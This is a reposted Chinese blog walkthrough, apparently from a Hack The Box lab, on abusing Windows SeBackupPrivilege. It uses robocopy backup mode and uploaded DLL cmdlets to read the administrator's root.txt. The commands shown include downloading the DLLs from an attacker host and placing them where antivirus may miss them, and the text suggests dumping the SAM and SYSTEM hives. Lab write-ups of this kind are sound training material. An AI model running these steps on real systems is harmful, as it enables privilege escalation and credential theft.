当前位置: 首页 > news >正文

利用 SeBackupPrivilege 的最快方法

在 Windows Active Directory 或独立环境中,最快利用 SeBackupPrivilege 的方法是通过使用 robocopy 命令。本文将详细介绍如何利用这一特权快速读取敏感文件(如 root.txt),以及另一种通过 DLL 文件利用 SeBackupPrivilege 的方法(尽管速度不如 robocopy)。


使用 robocopy 命令快速读取 root.txt

利用 SeBackupPrivilege 最快的方法是使用 robocopy 命令。通过该命令,可以以备份模式(/b 参数)复制文件,绕过文件和文件夹的权限设置(ACLs),从而访问通常被限制的敏感文件。

以下是具体操作步骤和示例:

示例命令

robocopy c:\users\administrator\desktop "C:\users\public\downloads" root.txt /mt /z /b

示例输出

*Evil-WinRM* PS C:\windows\temp> robocopy c:\users\administrator\desktop "C:\users\public\downloads" root.txt /mt /z /b
-------------------------------------------------------------------------------ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------Started : Tuesday, October 1, 2024 12:02:07 PMSource : c:\users\administrator\desktop\Dest : C:\users\public\downloads\Files : root.txtOptions : /DCOPY:DA /COPY:DAT /B /MT:8 /R:1000000 /W:30
------------------------------------------------------------------------------New File                  34        c:\users\administrator\desktop\root.txt
100%
------------------------------------------------------------------------------Total    Copied   Skipped  Mismatch    FAILED    ExtrasDirs :         1         1         1         0         0         0Files :         1         1         0         0         0         0Bytes :        34        34         0         0         0         0Times :   0:00:00   0:00:00                       0:00:00   0:00:00Ended : Tuesday, October 1, 2024 12:02:07 PM*Evil-WinRM* PS C:\windows\temp> dir c:\users\public\downloads\Directory: C:\users\public\downloadsMode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         10/1/2024  11:40 AM             34 root.txt*Evil-WinRM* PS C:\windows\temp> type c:\users\public\downloads\root.txt
7213....a..2ddd...batman.......

关键参数说明

  • /b:以备份模式复制文件,绕过文件和文件夹的权限设置(ACLs),这是利用 SeBackupPrivilege 的核心。
  • /mt:启用多线程复制,提升效率。
  • /z:在可恢复模式下复制文件,确保复制过程中断后可以继续。

通过上述命令,可以快速将 root.txt 从管理员桌面复制到公共目录,并读取其内容。


通过 DLL 文件利用 SeBackupPrivilege(速度较慢)

虽然 robocopy 是最快的方法,但另一种利用 SeBackupPrivilege 的方式是通过特定的 DLL 文件(如 SeBackupPrivilegeCmdLets.dllSeBackupPrivilegeUtils.dll)。这种方法更适合需要读取特定管理文件或敏感信息(如 root.txt 或注册表文件)的情况。

背景

备份操作员(Backup Operators)是 Windows 的内置组,组内用户具有执行备份和还原操作的权限。具体来说,这些用户被分配了 SeBackupPrivilege 特权,允许他们读取域控制器中的敏感文件,例如安全账户管理器(SAM)文件。

利用 SeBackupPrivilege 有多种方式,但通过 DLL 文件的方法虽然不如 robocopy 快,却提供了更细粒度的控制,尤其适合读取特定文件或注册表数据。

前提条件

  • 确保 SeBackupPrivilege 已启用。通过以下命令检查特权状态:

    *Evil-WinRM* PS C:\windows\temp> whoami /priv
    PRIVILEGES INFORMATION
    ----------------------
    Privilege Name                Description                    State
    ============================= ============================== =======
    SeBackupPrivilege             Back up files and directories  Enabled
    SeRestorePrivilege            Restore files and directories  Enabled
    SeShutdownPrivilege           Shut down the system           Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    
  • 启用该特权后,用户可以访问任何本地或远程目录(使用 cddir 命令),并列出其内容。

  • 要读取或复制受限文件夹中的数据,需以备份软件的方式操作。普通 copy 命令无法生效,必须使用 CreateFile 函数并指定 FILE_FLAG_BACKUP_SEMANTICS 标志。

以下是通过 DLL 文件利用 SeBackupPrivilege 的具体步骤:

步骤 1:准备两个恶意编译的 DLL 文件

需要以下两个文件:

  1. SeBackupPrivilegeCmdLets.dll
  2. SeBackupPrivilegeUtils.dll

这些文件可以通过以下链接获取:编译好的 DLL 文件。

步骤 2:将 DLL 文件上传到目标机器

通过 WinRM 或 PowerShell 上传文件:

通过 WinRM 上传
*Evil-WinRM* PS C:\windows\temp> upload SeBackupPrivilegeUtils.dll
Info: Uploading /home/alienx/Desktop/MACHINES/SEASON-6/CICADA/SeBackupPrivilegeUtils.dll to C:\windows\temp\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\temp> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/alienx/Desktop/MACHINES/SEASON-6/CICADA/SeBackupPrivilegeCmdLets.dll to C:\windows\temp\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
通过 PowerShell 上传
ps1> Invoke-WebRequest -Uri http://10.10.14.27:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
ps1> Invoke-WebRequest -Uri http://10.10.14.27:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll

注意:某些防病毒软件(AV)可能会检测并删除这些 DLL 文件,因此需要选择一个防病毒软件无法扫描的目录(如 C:\windows\temp\)来存储这些文件。

验证上传结果
*Evil-WinRM* PS C:\windows\temp> dirDirectory: C:\windows\tempMode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/23/2024   9:36 AM                vmware-SYSTEM
-a----         10/1/2024   8:54 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----         10/1/2024   8:54 AM          16384 SeBackupPrivilegeUtils.dll
-a----         10/1/2024   8:18 AM            102 silconfig.log
-a----         9/23/2024  10:01 AM         161031 vmware-vmsvc-SYSTEM.log
-a----         9/23/2024   9:54 AM          14662 vmware-vmtoolsd-administrator.log
-a----         10/1/2024   8:18 AM          16130 vmware-vmtoolsd-SYSTEM.log
-a----         9/23/2024  10:01 AM          51472 vmware-vmusr-administrator.log
-a----         10/1/2024   8:18 AM          14873 vmware-vmvss-SYSTEM.log

步骤 3:导入 DLL 文件

导入两个 DLL 文件并启用特权:

*Evil-WinRM* PS C:\windows\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\windows\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\windows\temp> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\windows\temp> Get-SeBackupPrivilege

步骤 4:复制和读取敏感文件

使用 Copy-FileSeBackupPrivilege 命令复制敏感文件(如 root.txt)到可访问目录:

*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege C:\users\administrator\Desktop\root.txt C:\windows\temp\flag.txt -Overwrite
*Evil-WinRM* PS C:\windows\temp> dirDirectory: C:\windows\tempMode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         9/23/2024   9:36 AM                vmware-SYSTEM
-a----         10/1/2024   9:00 AM             34 flag.txt
-a----         10/1/2024   8:54 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----         10/1/2024   8:54 AM          16384 SeBackupPrivilegeUtils.dll
-a----         10/1/2024   8:18 AM            102 silconfig.log
-a----         9/23/2024  10:01 AM         161031 vmware-vmsvc-SYSTEM.log
-a----         9/23/2024   9:54 AM          14662 vmware-vmtoolsd-administrator.log
-a----         10/1/2024   8:18 AM          16130 vmware-vmtoolsd-SYSTEM.log
-a----         9/23/2024  10:01 AM          51472 vmware-vmusr-administrator.log
-a----         10/1/2024   8:18 AM          14873 vmware-vmvss-SYSTEM.log*Evil-WinRM* PS C:\windows\temp> type flag.txt
a4a96.....ef2e69f......

附加说明

如果需要进一步操作,可以尝试读取 Windows 注册表 hives(如 SAM 或 SYSTEM 文件),并将其导出到本地机器,以获取管理员权限或其他敏感信息。


总结

  • 使用 robocopy:这是利用 SeBackupPrivilege 最快的方法,适合快速复制敏感文件(如 root.txt)。只需一条命令即可完成,效率极高。
  • 使用 DLL 文件:虽然速度较慢,但提供了更细粒度的控制,适合需要读取特定文件或注册表数据的场景。需要上传和导入 DLL 文件,并注意防病毒软件的干扰。

参考资料

  • Microsoft 官方文档 - 事件 4672
  • robocopy 命令参考
  • 编译好的 DLL 文件

通过以上方法,可以有效利用 SeBackupPrivilege 特权,访问 Windows 系统中的敏感文件和数据。


文章转载自:

http://5LVVSqK8.kzrbd.cn
http://bFHLP4ZT.kzrbd.cn
http://F7ilPzKu.kzrbd.cn
http://evB5Ee7A.kzrbd.cn
http://uYjjQz6l.kzrbd.cn
http://DFXsqMkk.kzrbd.cn
http://ecXyNs6o.kzrbd.cn
http://483R5wbi.kzrbd.cn
http://9Rv24TjU.kzrbd.cn
http://2WSFUGWr.kzrbd.cn
http://1Usm5xil.kzrbd.cn
http://RQznbcV3.kzrbd.cn
http://DxZ0KDXF.kzrbd.cn
http://bG73ZBnZ.kzrbd.cn
http://XMJGuguN.kzrbd.cn
http://QAoLWRgB.kzrbd.cn
http://WjYv9rG5.kzrbd.cn
http://44k5xHtG.kzrbd.cn
http://keYNLJxj.kzrbd.cn
http://XbZc6NhP.kzrbd.cn
http://2oFreZNv.kzrbd.cn
http://RoWNBZaW.kzrbd.cn
http://d5tmvIx7.kzrbd.cn
http://bOjGAB4d.kzrbd.cn
http://MglWYNFJ.kzrbd.cn
http://Lpb0Vsfb.kzrbd.cn
http://6Ito1lTN.kzrbd.cn
http://gQJW200d.kzrbd.cn
http://cGa5vhmk.kzrbd.cn
http://0ogGTiBF.kzrbd.cn
http://www.dtcms.com/a/371954.html

相关文章:

  • 华为基于IPD的产品质量计划模板
  • leecoede 二分查找 题集
  • 编写第一个程序-Ai8051U-32bit,Keil设置
  • Objective-C方法参数标签怎么设置
  • 国内外最新AI语言模型行情分析2025年9月最新内容
  • [数据结构] 栈和队列
  • 基于moduo库实现protobuf通信
  • Android开发-图像显示
  • OpenHarmony之设备风险管理平台(SecurityGuard)模块源码详解
  • Kotlin 协程之 Flow 的理解使用及源码解析
  • Vue2.x核心技术与实战(六)-Vuex
  • 认知篇#12:基于非深度学习方法的图像特征提取
  • 软考备考①
  • 信息安全工程师软考攻坚:第三章网络安全技术深度解析与实战训练
  • JDK17日期格式‘MMM’导致九月Sept/Sep格式化异常问题❗❗❗
  • Vulkan 学习(20)---- UniformBuffer 的使用
  • 微信小程序中实现AI对话、生成3D图像并使用xr-frame演示
  • 【不背八股】9.MySQL知识点汇总
  • MySQL6
  • 论文阅读:ICLR 2021 BAG OF TRICKS FOR ADVERSARIAL TRAINING
  • GD32自学笔记:4.ADC
  • LeetCode 522.最长特殊序列2
  • CentOS 7.2 虚机 ssh 登录报错在重启后无法进入系统
  • 腾讯混元 3D 2.0 Windows 便携版:低显存需求下的高效文/图生3D体验
  • 火山 RTC 引擎15 拉流 推流 地址生成器 、合流转推 开关
  • CesiumJS详解:打造专业级Web 3D地球仪与地图的JavaScript库
  • 数据结构:顺序表与链表
  • C++ 前缀和 高频笔试考点 实用技巧 牛客 DP34 [模板] 前缀和 题解 每日一题
  • kotlin - 平板分屏,左右拖动,2个Activity计算宽度,使用ActivityOptions、Rect(三)
  • 【软考架构】第七章 系统架构设计基础知识-7.2基于架构的软件开发方法:Architecture-Based Software Design,ABSD